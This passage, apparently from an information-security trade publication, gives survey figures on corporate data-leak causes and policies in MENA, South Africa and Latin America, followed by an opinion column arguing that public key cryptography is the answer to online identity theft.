62% and 68% of South African and MENA countries’ companies, respectively, don’t have a specific department monitoring information usage and assign IT officers to manage data safety issues.

40% of MENA companies disallow remote control software (TeamViewer).
38% of organisations in Lebanon, Iraq and Egypt have forbidden remote control software.

SOUTH AFRICA IS THE ONLY COUNTRY SHOWING EQUAL DATA LEAK SCORE DUE TO INTERNAL AND EXTERNAL VIOLATIONS
38% of companies indicated a hacker attack to be the reason.
38% selected computer/hardware theft or loss among the answers.
38% of organisations were affected by corporate fraud.

Human factor is identified as the biggest threat according to the respondents representing each of the regions which participated in the survey, and Latin America shows the highest percentage.
74% of organisations consider negligence the most repeated peril.
79% of companies in Latin America think of human factor as a major security breach provoker.
Alexei Parfentiev, leading analyst at SearchInform:
We observe the willingness of managers to foreknow a problem, to understand the incentives, the reasons which make employees compromise corporate assets. And it is not just about monitoring loyalty issues – negative feedback and sabotage. Employers seek to comprehend the problems of their staff members, to recognise situations which might undermine the wellbeing of the colleagues and interfere with business processes: drug or gambling addiction, extremism. Such an approach has a positive effect on a company’s internal workflow and increases the level of security in the regions.
DEEP DIVE
THE IMPERSONATORS OF THE INTERNET
B. ROBERT RAJA, CEO, ODYSSEY TECHNOLOGIES

Identity has always been a central concept to human society, culture and our very existence. Tales of impersonation and masquerading abound in recorded history, mythology and literature. What else can explain the amount of money the society is willing to spend on Hollywood and its various national avatars?

From Scarlet Pimpernel to Rudolf Rassendyll, the pretend king of Ruritania, the ill-fated but noble Sydney Carton and Ethan Hunt engage and hold our attention when they successfully pull off an impersonation. We applaud hero and villain alike when they cleverly masquerade as someone else in person, by letter or as a voice on a telephone. It ceases to be amusing when the person being impersonated is ourselves and we realize that the object of the impersonator was not our entertainment. At the end of the show, we find that a huge price has been extracted from us for a brief showing of skills we never wanted to witness in the first place!

Unfortunately, we subconsciously hesitate to hold an impersonator’s crime as equal to that of a murderer, a thief, a rapist or other such heinous criminals. It is only when we are the victim that the penny drops and we realize that identity theft is no less horrifying than the other crimes listed.

Many of the authentication-related problems we face in internetworked applications have their root in our inability to get past our collective mental image that authentication and identity are tied to our five senses. This is how we have historically visualized identity: associating it with a face, with a gait, a voice, the language and the cadence, things the person knows from his personal memory and so on. The kind of authentication methods and ‘factors’ we have adopted in our internet based applications would seem to appeal to that anthropomorphic concept of identity. Our inner child notwithstanding, the Internet is now a grown-up’s game. If we intend to heed our old instincts, we should be prepared to be a victim of every casual impersonator and identity thief that crosses our path.

The concept of identity on the internet and authenticating it has little to do with what appeals to the human senses or even our common sense. Identity on the Internet is not looks, nor smell, not sound, not feel – it has to be based on cold mathematics and cryptography. Our inherent preference to make this as enjoyable as a game frequently leads us to doom. Cryptography ceased to be a game of wordsmiths and linguists eight decades ago. It no longer has anything to do with meaning, sounds or symbols. Claude Shannon sounded the death knell for all that by putting it entirely on a measurable and mathematical foundation.

While symmetric cryptography left its linguistic roots in the fifties, the sixties and seventies brought us asymmetric cryptography, which took the art much further. A truly maintainable digital identity could now be based on an asymmetric cryptosystem. The only system that does not depend on any shared secret, this is capable of defining and maintaining an identity that no digital Scarlet Pimpernel can falsely assume. The only thing that remained then was a reliable way of tying such unforgeable digital identities to human and other physical entities. The Public Key Infrastructure (PKI) that emerged in the last decade of the last century was an attempt at that. The standards and protocols that evolved then were also aided by sympathetic regulation in several parts of the world.

Nevertheless, PKI has not been the roaring success it could have been. We need not look far for the reasons. In trying to be everything to everybody, PKI made itself hugely cumbersome to use. Nor was it successful in appealing to the fun-loving self in all of us. This is not an indictment of the technology itself. Public key cryptography lies at the core of several constantly used and highly trusted applications like device authentication, defense communications and high value financial transactions. It has also captured the popular imagination where it is embedded into the cryptocurrencies and other applications that use Blockchain algorithms.

It is a matter of time before we come to the collective realization that using Public Key Cryptography is the only secure and optimal way to reliable authentication. Along the route we will continue to face mega-thefts of identity and keep pretending to be surprised when someone cleans up our bank accounts protected by a really strong password with a second factor of OTP as well.